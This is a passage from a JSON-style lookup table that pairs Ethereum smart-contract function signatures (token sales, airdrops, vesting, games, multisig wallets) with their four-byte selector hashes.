"0xd3bc89b7", "GetGuestName()": "0x7d7786a3", "SetGuestName(string)": "0x11873ee7", "calcQueryCost(uint256,uint256)": "0xdeca15db", "ankcwdsleToken()": "0x68ecabcf", "OC()": "0x141d717b", "NZToken()": "0x3a319eff", "bookingBalanceOf(address)": "0x645e6ddc", "distributeBooking(uint256)": "0x3e460a84", "book(address,uint256)": "0x03efb5c4", "sendToken(uint256,uint256)": "0xcc657e62", "logAllTransactions(address)": "0x8e65f7e4", "getUserTransactionIndexes(address)": "0x664dd24f", "getTransactionDetail(uint256)": "0x9ff512fa", "answerRequest()": "0x2b6bc920", "setcommissionCompany(uint256)": "0x407e9e2c", "getAllClients(address)": "0xa64085cc", "setClient(address,address,string,string,string)": "0x7c612409", "FreeCoin(address,uint256,uint256,uint256,uint256,uint256)": "0xb7ae74fd", "addEntry(address)": "0xf15ae568", "setupRaffle()": "0xd096b8f0", "mintUpdateToken(uint256)": "0xd615950d", "burnUpdateTokenFrom(address,uint256)": "0x5a7da6b5", "transferFromToUpdateToken(address,address,uint256)": "0xab8d01b8", "burnUpdateToken(uint256)": "0xeb93c515", "freezeUpdateTokenAccount(address,bool)": "0xf95af64c", "airdropUpdateToken(address[],uint256[])": "0x3ee7ab85", "UpdateToken()": "0x29da2fda", "verifyHash(bytes32,uint8,bytes32,bytes32)": "0xc68e35b0", "reward(bytes32,uint8,bytes32,bytes32,bytes32,uint256)": "0x1c623ddd", "updateConstitutionPoll(address)": "0xdbf27e0c", "castDocumentVote(uint8,bytes32,bool)": "0x6eb58224", "castConstitutionVote(uint8,address,bool)": "0xa48515fc", "startDocumentPoll(bytes32)": "0x9a33aff9", "startConstitutionPoll(address)": "0x2123476b", "hasVotedOnDocumentPoll(uint8,bytes32)": "0x69422924", "hasVotedOnConstitutionPoll(uint8,address)": "0xbcc3af24", "getDocumentMajorities()": "0x34fe00b1", "incrementTotalVoters()": "0x246d41a9", "reconfigure(uint256,uint256)": "0xda3d7d7f", "processReinvest(address,bool)": "0x4ebc7a9c", "buyCalcAndPayout(address,uint256,uint256,uint256,uint256,bool)": "0xfcb36ce2", "buy(address,bool)": "0xbc99249e", "totalBondSupply()": "0x15ed6d06", "dividends_by_type(address,bool)": "0xbf0c4343", "reinvest(address,bool)": "0xf32188a5", "fund(address,address,bool)": "0xadaea0b9", "nullFace(address)": "0x1177dc34", "bondsOf(address)": "0x9570370f", "AvocadoToken()": "0x80921070", "TPPC2018Token(uint256,string,string,uint256)": "0x1939805f", "FirstTradingEcosystem()": "0xe38d0fbd", "positionScount(address)": "0x7f9d139a", "getLockPosition(address)": "0xd2e01b2f", "getLockStatus(address)": "0x0f36f691", "unlockStatus(address)": "0xfdf78f70", "lockStatus(address)": "0x15497d2c", "setLockPostion(address,uint256,uint256,uint256)": "0x35a568b9", "sellCoin(address,uint256)": "0x9e12c9b9", "transferFromCheck(address,address,uint256)": "0x5a083f54", "ADEToken(uint256,uint256)": "0x09d2100d", "checkPosition(address,address,uint256)": "0xa5ad1348", "unlockMinedBalances(uint256)": "0x64c8cd8c", "transferMined(address,uint256)": "0x75a374ee", "post(string,address[],uint256[])": "0x08093ff6", "send(bytes20[])": "0xad732eea", "send(address[])": "0x298c0733", "post(string,bytes20[])": "0x34716f67", "post(string,address[])": "0xdb803a86", "Topplay()": "0xc6c55773", "connectTest()": "0x3cec475a", "setNplay(address)": "0x64976b4d", "setEplay(address)": "0xfac2b5f8", "LITECORE()": "0x7af20a0a", "SDToken()": "0x1c448231", "setLocker(address)": "0x171060ec", "CxNtoken(address)": "0x6eb267ab", "Bonus(address)": "0x42846c09", "mintForYear(address,uint256)": "0xdb403747", "mintForMarket(address,uint256)": "0xcbc61daf", "saleMilk(uint256,uint256)": "0xf89e4df3", "payPlace(uint256)": "0x63798661", "blocktrade()": "0x72987457", "controlled()": "0xde00a094", "NotitiaToken()": "0x26e683fb", "Plutaneum()": "0x441156cf", "getNextOrderUser(address,address,uint256,address)": "0xb9cf9d49", "fillOrder(address,address,uint256,address,uint256)": "0x5918f00c", "setManualWithdraw(bool)": "0xf9d176b4", "userMakeOrder(address,address,uint256,uint256,address)": "0x437f6a4b", "setFeerate(uint256[3])": "0xbc80bee8", "setup(uint256,uint256,uint256,bool)": "0xa075e164", "updateOrderAmount(address,address,uint256,address,uint256,bool)": "0x50e878df", "updateNextOrderUser(address,address,uint256,address,address)": "0x1c7a3d31", "getOrderAmount(address,address,uint256,address)": "0xb2cc4165", "getNexOrdertUser(address,address,uint256,address)": "0xe24613ea", "updateNextOrderPrice(address,address,uint256,uint256)": "0xd5ae1085", "getNextOrderPrice(address,address,uint256)": "0x32ace499", "disconnectOrderUser(address,address,uint256,uint256,address,address)": "0xb31ab1c3", "disconnectOrderPrice(address,address,uint256,uint256)": "0x4a74ca99", "connectOrderUser(address,address,uint256,address)": "0x3ad213e0", "connectOrderPrice(address,address,uint256,uint256)": "0xd13936fe", "updateBalance(address,address,uint256,bool)": "0xc5ab4602", "fillOrder(address,address,uint256,uint256)": "0xd177e6a6", "checkPricePair(uint256,uint256)": "0xc6b0a1fa", "caculateFill(uint256,uint256,uint256,uint256)": "0x3b9ed710", "makeTradeDetail(address,address,uint256,uint256,address,uint256)": "0x101a917e", "makeTrade(address,address,uint256,uint256,uint256,uint256)": "0x70bb478f", "findAndTrade(address,address,uint256,uint256)": "0xa63d0be6", "makeOrder(address,address,uint256,uint256,address,uint256)": "0x39b25269", "checkPriceAmount(uint256)": "0x22242382", "checkAmount(address,uint256)": "0xd6b5983d", "checkBalance(address,address,uint256,uint256)": "0xfa8edab6", "depositAndFreeze(address,address)": "0xa32af535", "trade(address,address)": "0x3c54ca8c", "caculateFee(address,uint256,uint8)": "0xa028d749", "userCancelOrder(address,address,uint256,uint256,address)": "0xa4bef732", "deposit(address,address)": "0xf9609f08", "setMinAmount(address,uint256)": "0xd5708d5a", "setup(uint256,uint256,uint256)": "0xc75abf24", "Baliv()": "0x1016ad94", "calcReleaseToken(address,uint256,uint256)": "0xf6f98e34", "canTransferUST(bool,bool)": "0x15c3cd94", "OkeToken()": "0x0e6bc36c", "TableDeRapprochement_322()": "0x413bc8eb", "BIToken()": "0x0cc10550", "refund(address,address)": "0x5e30b8a6", "end(address,address)": "0xa5289158", "Milkcoin()": "0x88840671", "ANACoin()": "0xb488abd8", "IBST()": "0x38ca60a2", "ATCReserveLocker()": "0x6584fcce", "PRESALE_TOKEN_SOFT_CAP()": "0x9ed78df0", "getTournamentRate()": "0x8daf4dcf", "Total_Payouts()": "0x8a3a84a8", "halvingPeriod()": "0x5a3e251f", "ethernautsStorage()": "0x56410637", "resetAirdropAmount()": "0xab022b28", "totalCashout()": "0x86048c9a", "ADDR_TKG_TEAM()": "0x770d8e79", "pIdIter_()": "0x81715d8c", "highEtherBonusLimit()": "0x7ee62440", "withdraw_to_owner()": "0xc55ed894", "reserveForJackpot()": "0x7e8d2c19", "EOS_address()": "0xf19d2bcd", "checkActionIsAuthorisedAndReset()": "0xe8b69081", "isContractFrozen()": "0x131d2873", "rewardBalance()": "0xaa5c3ab4", "paused_4()": "0xe17a3ccf", "saleRoundsSet()": "0x6afc3474", "ENS_ROOT()": "0xa9bf1c9f", "totalPlayerBalance()": "0x6e30418b", "foundersSupply()": "0x03c45305", "timeWait()": "0x441d6a61", "affiliatesAddress()": "0xdd192de7", "ownerPayout()": "0x4264b4e0", "preTgeManager()": "0xc8c749ec", "tsSucceeded()": "0x0739cd26", "devPaid()": "0x74f12933", "fundRecipient()": "0xd939c960", "secondsToHold()": "0xd1ec32ed", "authorizedToDraw()": "0xf7ec221e", "sPeriodEndDate()": "0xd880285e", "level1Bonus()": "0xd8bf0568", "ETH_DECIMALS_FACTOR()": "0xce809e4e", "asideTokensMintDate()": "0xb412a4b7", "startAirdropTime()": "0xa132ab82", "round3TokensRemaning()": "0x3bc17b28", "positive_terms_of_Service()": "0x7a3b0b5d", "INITIAL_SEED_FARMING_AMOUNT()": "0x83cb2fee", "_version()": "0x3e118dbe", "NumberOfPart()": "0xa7737b93", "BonusCalcPos()": "0x08c8ba00", "pullEtherFromContractAfterPreICOPrivate()": "0x871cf692", "EGGS_TO_HATCH_1CHICKEN()": "0xe74ceb77", "founderWithdrawablePhase4()": "0xe15618b9", "enableAffiliate()": "0x28b7e183", "ethAmount()": "0xc98166c0", "mininumContributeWei()": "0x454bccd0", "lastBlock_v18()": "0x7f76bd3a", "totalInvestedInWei()": "0xf117c924", "CONTRIBUTION_MIN()": "0xba9bb827", "getMostExpensiveCryptoGamer()": "0xd69a0d2f", "bitGuildAddress()": "0xc67747a5", "isDayFirst()": "0xaf314579", "spartans()": "0xaa141ee2", "pot()": "0x4ba2363a", "privateSupply()": "0x56bd182d", "referrerBonusRate()": "0x03b9f0b2", "preSaleStartTime()": "0x06d65af3", "sponsorLevel()": "0xea6f1c4a", "DEFAULT_TEXT()": "0x2fdeca37", "minTokenForSP()": "0xa8986327", "PLAYER_TIMEOUT()": "0xa99a3f03", "initialVestAmount()": "0xcd5bfbe4", "unopened_bid()": "0x6ca0101e", "_result()": "0x79147cf0", "issuanceEnabled()": "0xa8590135", "canClaimTokens()": "0xe22a3af8", "eth_amount()": "0x2cd33a54", "saleExchangeRate4()": "0x7c078723", "gracePeriodAfterRound1Target()": "0x688f5ed2", "totalWeiRefunded()": "0xa56c2ac0", "MAX_DAILY_TOKEN_SOLO_SPEND()": "0x29fec030", "addressCashwolf()": "0xe90a3cf2", "rndReduceThreshold_()": "0x2cf2f1d1", "crossForkBlockNumber()": "0x7c132f2c", "currentTokenDistribution()": "0x233a74c9", "previousStageIsFinalized()": "0xbe3c8488", "allowPriceUpdate()": "0x248d14eb", "accPreICO()": "0x6ae38577", "addWeight()": "0xfbe3549c", "tixFoundersDeposit()": "0x91194aab", "communityDevelopmentWallet()": "0x74acf0b1", "withdrawEnabled()": "0x2287e96a", "minimumEntryThreshold()": "0x6d320b17", "monthLength()": "0xa1a04486", "freezTime()": "0x1047d79e", "PRE_ICO_BONUS_RATE()": "0xc0ac3d1c", "PreIcoClosedManually()": "0x7a1bf7f6", "roughSupply()": "0x945e5f24", "tokenRate20()": "0xcbac8816", "tokensForBounty()": "0x644280e2", "betsWon()": "0x3e361281", "CTOAddress()": "0xf2eec69b", "ICOwei()": "0xd6effa2b", "unclaimedDividends()": "0x3cb802b9", "startFinalStage2()": "0xba3f56f8", "BIT()": "0xdfb685cb", "fx()": "0xe077ca97", "getTokensSold(address,bytes32)": "0x0c51171d", "getTierStartAndEndDates(address,bytes32,uint256)": "0x16e7c80d", "getCrowdsaleTierList(address,bytes32)": "0xf5e493aa", "getCrowdsaleMaxRaise(address,bytes32)": "0x8cde43dc", "getCrowdsaleTier(address,bytes32,uint256)": "0x4357b3de", "getCurrentTierInfo(address,bytes32)": "0xe758d445", "tierModifiable(uint256)": "0xfac78d83", "init(address,uint256,bytes32,uint256,uint256,uint256,bool,bool,address)": "0xdb7b87ff", "setLockPostion(address,uint256,uint256,uint256,uint256)": "0x98dacb46", "setConfig(uint256,uint256,string,string,uint256)": "0xa51f41a0", "MyToken(uint256,uint256,string,string,uint256)": "0x88a2995d", "TSTEST2()": "0x90a1d580", "specialApprove(uint256,bytes32,bytes)": "0xb56ea5cc", "specialAllowance(address,address)": "0x27c36a47", "FFCryptoCoinToken()": "0x1fd023ab", "pay(address,uint256,uint256)": "0x5f065346", "setMarginSpend(uint256)": "0xffe496f2", "setRebuyThreshold(uint256)": "0x97e42023", "createLoan(address,address,bytes32,uint256,uint256,uint256,uint256,uint256,uint256,string)": "0x4c5df57a", "_updateHistory(address,address)": "0x96d8fe3b", "_setup(address,address,uint256,bool)": "0x66adf835", "maintenanceDeactivateUser(address)": "0x37567d49", "maintenanceSetAccountsList(address[])": "0x1e6704bd", "burnFeatureDeactivation()": "0xf1838a15", "isLocked(address,address)": "0x8612d049", "isBurner(address,address)": "0x0615b520", "setBurner(address,address,bool)": "0x87a407a1", "isSet(address,address)": "0x78faff96", "getAccountAddress(uint256)": "0xdb4cf8e6", "accountsListLength()": "0x42c304be", "LWFToken()": "0xe5499e55", "MyToken(uint256,uint256)": "0x4ea28ee6", "Lockable(uint256)": "0x327428b1", "lockSupplierAndLockPosition1(address,address)": "0x6d2d4e52", "isBurner(address)": "0x4334614a", "getPositionCount(address,address)": "0xedf0b0df", "setBurner(address,bool)": "0x0d895ee1", "lockSupplierAndLockPosition(address,address)": "0x1648be60", "tokenInit()": "0x2c9f9fed", "XTL()": "0x96c2d498", "canTransfer()": "0xdf68c1a2", "TRANSFER(address,address)": "0xaa18c05c", "Medcash()": "0x0a8e891f", "APPROVAL(address,address)": "0xf9eb4ee2", "FaceBookCoin()": "0xdd982bdf", "SECURRO()": "0xda1f149c", "validUser(string)": "0xf4b432b8", "getGivenCount()": "0x8f43166b", "appendString(string)": "0xce0e19ba", "getFromFaucet(string)": "0x4a9a6f15", "DestlerDoubloons()": "0x0cd7d0f2", "WartegToken()": "0x0c61257e", "HARJToken(string,uint8,string)": "0xe13da09f", "RUVI()": "0x043eabd0", "POOPOO()": "0x218cd7a1", "releaseTCLRinTeamTokens()": "0xd0c9bb92", "ForgeCDN()": "0x0257210f", "TCLRToken(address,address,address,address,address,address)": "0xf1cea858", "FSC3()": "0xbb4d0cb5", "computeBonus()": "0x0453a7d2", "endAtCheck(uint256)": "0x6bf13959", "tuneLastStageStartAt(uint256)": "0x25687e28", "icoInvestmentWei(address,uint256)": "0x37b0786a", "canReceive(address)": "0x90d370ba", "getPool(uint32)": "0x9da46ee3", "canSend(uint32,uint32)": "0x70646de9", "sendShip(uint32,uint32,address)": "0x8c165932", "resetPool(uint32)": "0x389b75d6", "configureLimit(uint16,uint16)": "0xa964bb9a", "createGalaxy(uint8,address)": "0x26295b52", "startDocumentPoll(uint8,bytes32)": "0x05bbf5db", "detach(uint32,uint32)": "0x16e58a1b", "reject(uint32,uint32)": "0x617bb8f5", "adopt(uint32,uint32)": "0xc716b616", "escape(uint32,uint32)": "0xbf5772b9", "canEscapeTo(uint32,uint32)": "0x4a013296", "transferShip(uint32,address,bool)": "0x1d9046ce", "setSpawnProxy(uint16,address)": "0xae326221", "getSpawnLimit(uint32,uint256)": "0xef20bff8", "spawn(uint32,address)": "0xa0d3253f", "configureKeys(uint32,bytes32,bytes32,uint32,bool)": "0x4447e48c", "onUpgrade()": "0x1824a46b", "findEmptySlot(uint32)": "0x7b991c1a", "findClaim(uint32,string,string)": "0x2945a57d", "clearClaims(uint32)": "0xeaae46e5", "removeClaim(uint32,string,string)": "0x296e3661", "GuneToken()": "0xe01c979a", "addClaim(uint32,string,string,bytes)": "0xfb1d8201", "getShipClass(uint32)": "0xda3cbf96", "getPrefix(uint32)": "0xe4a358d7", "setOperator(address,address,bool)": "0xbc735d90", "ARS()": "0x0c012834", "isOperator(address,address)": "0xb6363cf2", "F2UPay()": "0x273e2c78", "getTransferringFor(address)": "0x91398f25", "getTransferringForCount(address)": "0xe01cff84", "setTransferProxy(uint32,address)": "0x2c7ba564", "getTransferProxy(uint32)": "0x24541f78", "isTransferProxy(uint32,address)": "0x3262207c", "getSpawningFor(address)": "0x9b0d1b2c", "team3Token()": "0x838bdce2", "minWeiToBuy()": "0x5efbcfba", "PRICE_4()": "0x56d44694", "totalInterests()": "0xb93c109f", "round0Target()": "0x1bd72647", "maximumAllocationPerParticipant()": "0xea1c0379", "coupleImageIPFShash()": "0x1856a6df", "decidingBlock()": "0x89cd4b5e", "_endDate()": "0xdbfa5863", "gameCost()": "0xcab896dc", "isContractOwnerLocked()": "0xe62af875", "advisorsLock()": "0x4f64aa09", "BOUNTY()": "0xd081f2b8", "dollars_per_kilo_ether()": "0xa5f75a5e", "rndNo()": "0x3c28308a", "ICO_PHASE2_BONUS_PERCENTAGE()": "0x49942483", "TARGET_ADDRESS()": "0xeca25f42", "WITHDRAWAL_DELAY()": "0x0ebb172a", "preIcoBuyPrice()": "0xffab984d", "pre_ico_allocation()": "0x5cbcb302", "totalPromo()": "0xd79e3755", "m_totalDatasetCount()": "0xfbc09b26", "developerMiningPower()": "0x5d56e0a4", "ICO_PHASE3_PERIOD()": "0xd3c5ea45", "getCurrBalance()": "0xb3ac149c", "walletTranslate()": "0xff30feef", "hardCapInCents()": "0x88308ca1", "numGamesCheated()": "0x9e31f9b6", "mode()": "0x295a5212", "mediator()": "0x6d0501f6", "team4Address()": "0x119d97ee", "allowRefund()": "0xffb2d35d", "winner_pool_amount()": "0x54d50378", "timeToChallenge()": "0x0689d0ff", "CROWD_WEEK3_PERIOD()": "0xbe81d5bf", "aDay()": "0x7e410427", "round1StartTime()": "0x384baa8a", "wei_raised()": "0x3aedf90a", "DECIMAL_MULTIPLIER()": "0x1aef8058", "lastLapId()": "0xa158e632", "dividendPeriod()": "0xe4cc98a5", "softcapAchieved()": "0x836880d3", "promoCount()": "0x0b663e63", "numAllocations()": "0x3a2960e1", "percentagePerMonth()": "0xa5c6ac0d", "nextRoundMaxDonors()": "0x8f7d79da", "RESERVED_TOTAL_AMOUNT()": "0xc403cf6d", "amount3()": "0x7543af9c", "getPresaleEndTime()": "0x5edabc99", "currentMaxPurchase()": "0xaf0638f6", "raisedWei()": "0xbc59d45a", "PRE_SALE_END()": "0xe1f7d0e1", "_HUNDRED()": "0xed6db106", "mainStartTime()": "0x47eafefc", "tokenForTeam()": "0xf15a1b59", "minimumContributionPresalePhase1()": "0xc68fd307", "DEVELOPER_SUPPLY()": "0x4fe72439", "totalDepositedEthers()": "0x807f08ea", "yearOfProduction()": "0x0fa01949", "VESTING_OFFSET()": "0x323f6fe0", "companyHolding2y()": "0x130d04d0", "dividendDistributionDuration()": "0x5e871f0c", "checkVotingForSendWeiFromExchange()": "0x4faed396", "hasntStarted()": "0xda89970b", "Devs_Supply()": "0xeef73ff9", "icoBonus5EndDate()": "0xeecfb384", "EARLY_CONTRIBUTOR_VESTING_CLIFF()": "0x4d140467", "zeroOut()": "0x79cf3a7a", "minOrderEthAmount_()": "0xef3cbc39", "TOKENS_HARD_CAP()": "0x831a1754", "isWhiteListed()": "0xef674e66", "minimumHydroStakeDelegatedUser()": "0xba75d0de", "authorisedInvestors()": "0xa937c28b", "bonusEnds50()": "0xddc983f2", "the120address()": "0x936bfa40", "raceDistCon()": "0xeb80b3d1", "cursedContract()": "0x9a581271", "WITHDRAWAL_TRIGGER_AMOUNT()": "0x4d804e60", "WALLET_LB_ADMIN()": "0x91da9178", "totalCurrentFunders()": "0x962ffeae", "paymentsCount()": "0xaafab1e8", "PRE_SALE_BONUS_PER_CENT()": "0xbb10b2f1", "EtherDelta()": "0xfb083fdc", "bonusPhase1()": "0x628392bd", "bountyTokensTransferred()": "0x4fe8d03f", "founderTokensLockedUntil()": "0xca5c058d", "withdrawer()": "0xcdc18424", "rate8_end_at()": "0x74942868", "democFee()": "0x6606b7d4", "beneficiaryMultiSig()": "0x3ab64c33", "rejectInvestmentWithdrawal()": "0x115bd3f8", "allTime()": "0x7842dca8", "crowdsaleBalance()": "0x42ae0a16", "FBLFund()": "0x13877deb", "ClientQty()": "0x4dfdebe9", "token_description()": "0x310d3f69", "extraMinted()": "0x96fedaf7", "operationsAccount()": "0x0f5f1dbc", "walletFromTeam()": "0xd620caaa", "initialFunds()": "0xd55e725b", "distribute(address,uint256,uint256)": "0xe2c92a52", "lockupBalanceOf(address)": "0x4728537c", "POPCHAINCASH()": "0x3c4a2989", "PeerBudsToken()": "0x24652ba2", "GIFT(uint256,string,uint8,string)": "0xb70a7545", "_hasCorrectTreasury(address)": "0xc6f88b0a", "capitalAllocation()": "0x3e1c01b5", "capitalAllocatedTo(address)": "0x9328fa02", "capitalAllocated()": "0x03cddb2c", "capitalNeeded()": "0xad0212df", "addCapital()": "0x4110b2c9", "wasSaleEnded()": "0x64928d24", "numCancelledRequests()": "0x149dffc8", "numCompletedRequests()": "0xf8f122ba", "numPendingRequests()": "0xb4dad588", "isRequestExecutable(uint32)": "0x53bd8bdb", "getRequest(uint32)": "0xe9958314", "executeDistributeCapital(uint256)": "0x552b71aa", "executeRaiseCapital(uint256)": "0x0e0f05a5", "executeRecallCapital(address,uint256)": "0xee1ae93b", "executeSendCapital(address,uint256)": "0x1c6ce9a3", "_removePendingRequestId(uint32)": "0x317a71ea", "_addPendingRequestId(uint32)": "0x0dcb4627", "executeRequest(uint32)": "0x0ac94000", "cancelRequest(uint32,string)": "0xb5c12c09", "createRequest(uint256,address,uint256,string)": "0x79a8ba40", "computeTokenAmount(uint256)": "0x9f871242", "BIDTToken(address)": "0x605ae1d0", "closeBuy()": "0xc6ab5cdc", "openBuy()": "0xd4a67930", "setPublicPlacementNum(uint256)": "0x9b480435", "ETH()": "0x8322fff2", "createDeposit(address,uint256,uint256)": "0x2f9c1df6", "createRawDeposit(address,uint256,uint256,uint256)": "0x22734c0c", "getReferralPackageKind(bytes)": "0xb5ba9a7e", "getRefererAddress(bytes)": "0x437852b6", "AddressDailyReward(address)": "0x24463cbe", "payToReferer(address,uint256,string)": "0x56841b36", "rewardMint(address,uint256)": "0x72104205", "depositMintAndPay(address,uint256,uint256)": "0x9cd0c511", "setTreeStructure(address,address)": "0xc0a28014", "checkTreeStructure(address,address)": "0x7eb30cd0", "setStatusInternal(address,uint8)": "0x7724bdbf", "setStatus(address,uint8)": "0x278e07ce", "getStatusOf(address)": "0x6b89bfc7", "StatusContract()": "0x4754a311", "saveToCW()": "0xfcb5ced3", "getPercentageCW()": "0xe863a122", "setPercentageCW(uint256)": "0x92a8424d", "getColdWalletAddress()": "0xd5477d37", "setColdWalletAddress(address)": "0xf477c2b9", "getKindOfPackage(address)": "0xb955b95c", "depositBalanceOf(address)": "0xfba13bd0", "depositMintSince(address,uint256,uint256,uint256)": "0xaf03105b", "depositMint(address,uint256,uint256)": "0x6f964659", "PackageContract()": "0xb275a9d8", "RockCoin()": "0x32f8d1e4", "burnUnsold()": "0xb52a5851", "stopPreSale()": "0xf8fb3366", "setUSDExchangeRate(uint256)": "0x151c61b6", "getCurrentModifier()": "0x1e519c4c", "setTransferEnabled(bool)": "0x9fe9f623", "setFounder(address)": "0x7a341bc7", "setAirdropped(address)": "0x3b2b8ce9", "isAirdropped(address)": "0xbfa51df9", "airdropAmount(uint256)": "0xa4d5a3a5", "drop(address[])": "0x8ef5eaf0", "finishAirdrop()": "0x1a668c42", "startAirdrop(uint256)": "0xbeae207f", "BOBTokenVesting(address,uint256,uint256,uint256,bool)": "0x4dbbddff", "newPLCRWithToken(uint256,string,uint8,string)": "0xbf6c4de9", "createProxyImpl(address,bytes)": "0xb6e86e13", "createProxy(address,bytes)": "0x61b69abd", "createManyProxies(uint256,address,bytes)": "0x7b8b82a8", "getInsertPointForNumTokens(address,uint256,uint256)": "0x2c052031", "didReveal(address,uint256)": "0xaa7ca464", "didCommit(address,uint256)": "0x7f97e836", "revealPeriodActive(uint256)": "0x441c77c0", "commitPeriodActive(uint256)": "0xa4439dc5", "revealVotes(uint256[],uint256[],uint256[])": "0x8090f92e", "commitVotes(uint256[],bytes32[],uint256[],uint256[])": "0x3ec36b99", "rescueTokensInMultiplePolls(uint256[])": "0xbb11ed7e", "INT(address)": "0x9c9de4dc", "VAToken()": "0xc2676e39", "ETO()": "0x626c6bc6", "doKeccak256(uint256)": "0x57788716", "sqrt(uint64)": "0x23b37bb6", "applyBooster(uint256,uint256)": "0x51b3666f", "_handleWin(uint256,uint256)": "0x7c12b6f2", "addHash(bytes32[])": "0xb5b90a26", "batchResolveAquarium(uint256[])": "0x14c78333", "_resolveAquarium(uint256)": "0xb64698cb", "_fishAquarium(uint256)": "0xaab40661", "batchFishAquarium(uint256[],address)": "0xb0f94b16", "setBoosters(address)": "0xcbc846d9", "setAquariumCost(uint256)": "0xf2b1be45", "setWeightLostPartLimit(uint8)": "0x763a6390", "_mintFish(address,uint32,uint8,uint8,uint8,bytes16)": "0x265a8636", "mintFish(address[],uint32[],uint8[],uint8[],uint8[],bytes16[])": "0x082d7187", "Fishbank(address,address,address)": "0xda122e02", "set_symbol(string)": "0xf3ea4c68", "set_Name(string)": "0x6690f30b", "withdraw_Eth(uint256)": "0x0bcbfe1c", "withdraw_Leim(uint256)": "0x8892d571", "set_prices(uint256)": "0x03d258c4", "Leimen()": "0x3a830a96", "returnRemainingTokens()": "0x161b75b2", "EtherGrand()": "0xfc909fc7", "Ribble()": "0x05788701", "BTSC()": "0x33fdb097", "RajTestICO(address)": "0x45f8f1e8", "RajTest()": "0xe9ecd32b", "addExisitingContributors(address[],address,uint256[])": "0xf1b74348", "CommitGoodToken()": "0x05e57cb1", "GOLDEQ()": "0x8381ada3", "creditWalletUserLMNO(address,uint256)": "0xea316027", "debitWalletLMNO(address,uint256)": "0xb8079d49", "finalizeCrowdSale()": "0x8ca9e721", "assignTokensWallet(address,address,uint256)": "0xd87c5df6", "cashInvestment(address,uint256)": "0x19fc9e54", "getVestedAmount(uint256,uint256)": "0xf137d1a3", "getData(uint256,uint256)": "0x4e4fe306", "getReleasableBonusAmount(uint256,address)": "0x5fd0526e", "getReleasableAmount(uint256,address)": "0xc5460e71", "withdrawBonusToken()": "0x02f83a56", "assignTokenIJK(address,uint256)": "0x57dc561f", "assignToken(address,uint256)": "0xa401d24d", "addWalletConfig(uint256,uint256,uint256,uint256)": "0x31b39a56", "preAllocation(uint256,uint256)": "0x95e3cd5c", "addWalletAddressAndTokens(uint256,address,uint256)": "0x18debd27", "startStopICO(bool)": "0x5a5ddcf6", "setDSTMultiSig(address)": "0x72198ead", "setDSTWalletLMNO(address)": "0xa449a62e", "HoChiMinh()": "0xd997598b", "DoftToken()": "0xb3c4f83b", "MADToken()": "0xcf45f83b", "Windlord()": "0x136bcbab", "recordSale(uint256,uint256)": "0x23586685", "closeEarly(uint256)": "0x14c9b8a5", "removeUsersWhitelistB(address[])": "0x565135ce", "removeUsersWhitelistA(address[])": "0x836d9665", "addUsersWhitelistB(address[])": "0x0f77c1d3", "addUsersWhitelistA(address[])": "0xd89ef018", "setGasPriceLimit(uint256)": "0x09231602", "setWhitelistManager(address)": "0x41a49409", "GoblinChainToken()": "0xdbfb18e7", "GanaLocker(address,address)": "0x5fb1552c", "returnOwnership()": "0x297d1a34", "BEXMToken(uint256,string,string)": "0xd51f5abd", "addTotalIndividualWeiAmount(address,uint256)": "0x53b6f766", "setTotalIndividualWeiAmount(address,uint256)": "0x5eed1f1a", "getTotalIndividualWeiAmount(address)": "0x4d42c7e4", "TkoWhitelist(address)": "0xc2784966", "YuanLianToken()": "0x228e92cf", "LooqCrowdsale()": "0x83fcfafe", "ACIFToken()": "0x435f02f9", "temporaryEscapeHatch(address,uint256,bytes)": "0x7832bbf7", "numTokensForContributor(uint256)": "0x60808037", "doDistributionRange(uint256,address[],uint256[])": "0x4a0a7f2d", "handleTokensReceived()": "0xde7383e0", "_handleTokensReceived(uint256)": "0x8f19ff45", "ISBParentsCoin()": "0xf58edbca", "changeVestingAddress(address,address)": "0xbf381f93", "revokeSchedule(address,address,address,address)": "0x514a88ae", "withdrawVestedTokens()": "0x39f05521", "vested(address)": "0x7102b728", "whichPeriod(address,uint256)": "0xadaf28d1", "registerVestingSchedule(address,uint256,uint256,uint256,uint256)": "0x9b880fee", "tryInsertSequenceId(uint256)": "0x979f1976", "recoverAddressFromSignature(bytes32,bytes)": "0x45550a51", "verifyMultiSig(address,bytes32,bytes,uint256,uint256)": "0x9bf7ef63", "WalletSimple(address[])": "0x1f417317", "Forwarder()": "0xb907996a", "_getRandomNumber(uint256)": "0x0ac9d35f", "_attack(uint256,uint256,uint256,uint256)": "0x2a515949", "setEntranceFee(uint256)": "0xfe56f5a0", "setEdCoreContract(address)": "0xc8b39eb5", "attack(uint256)": "0x64dd891a", "getRunDetails(uint256)": "0xefada80b", "DungeonRunAlpha()": "0xafcee461", "calculateTop5HeroesPower(address,address,uint256)": "0xb9b162c3", "getDungeonPower(uint256)": "0x8015e6f3", "getHeroPower(uint256,uint256)": "0x6c0d2c8b", "getHeroAttributes(uint256)": "0xbbaa7a57", "getPlayerDetails(address,address)": "0x86a5ebe1", "getGameSettings()": "0x508f46a0", "_useOraclize()": "0xd489fc8b", "_timeRemaining()": "0x8fad8334", "_rewardWinners()": "0xe65b490d", "_mintSqr(uint256,address,uint256,uint256)": "0x73a80b74", "setUsername(address,string)": "0xe2045452", "setStartPrice(uint256)": "0x17d86154", "setOraclizeAllowance(uint256)": "0x2e995fd7", "setInitialDuration(uint256)": "0x066208de", "setEntryPrice(uint256)": "0xa6e77af1", "seedGame()": "0x22f43bb5", "joinSqr(uint256)": "0x6b1f78c8", "getUsername(address)": "0xce43c032", "getSqr(uint256)": "0x45cf8467", "getRoundPrizeShare()": "0x64e5c8be", "endCrowdsale(uint256)": "0x7a504ceb", "ownerStartsCrowdsale(uint256)": "0xf6d3df65", "updateCnyBtcRate(uint256)": "0x352a950c", "updateCnyEthRate(uint256)": "0xb3f4d235", "withdrawForCompany()": "0x6f5cca83", "recordOffchainPurchase(address,uint256,uint256,string)": "0x1dea3f0c", "setup(address,uint256)": "0xf46d1982", "StarbaseCrowdsale(address,address)": "0xe375dfed", "numberOfRawEarlyPurchases()": "0x4c575fcc", "getEarlyPurchase(uint256)": "0xc0851e09", "normalizedEarlyPurchases()": "0x50787341", "StarbaseEarlyPurchaseAmendment()": "0x1984a063", "loadStarbaseEarlyPurchases(address)": "0x88760a18", "isAmendedEarlyPurchase(uint256)": "0x1eafe00c", "amendEarlyPurchase(uint256,address,uint256,uint256)": "0x84035e07", "isInvalidEarlyPurchase(uint256)": "0x5b9283e7", "invalidateEarlyPurchase(uint256)": "0x754e1e8e", "earlyPurchases(uint256)": "0x2288fad6", "StarbaseEarlyPurchase()": "0xfb4a6cde", 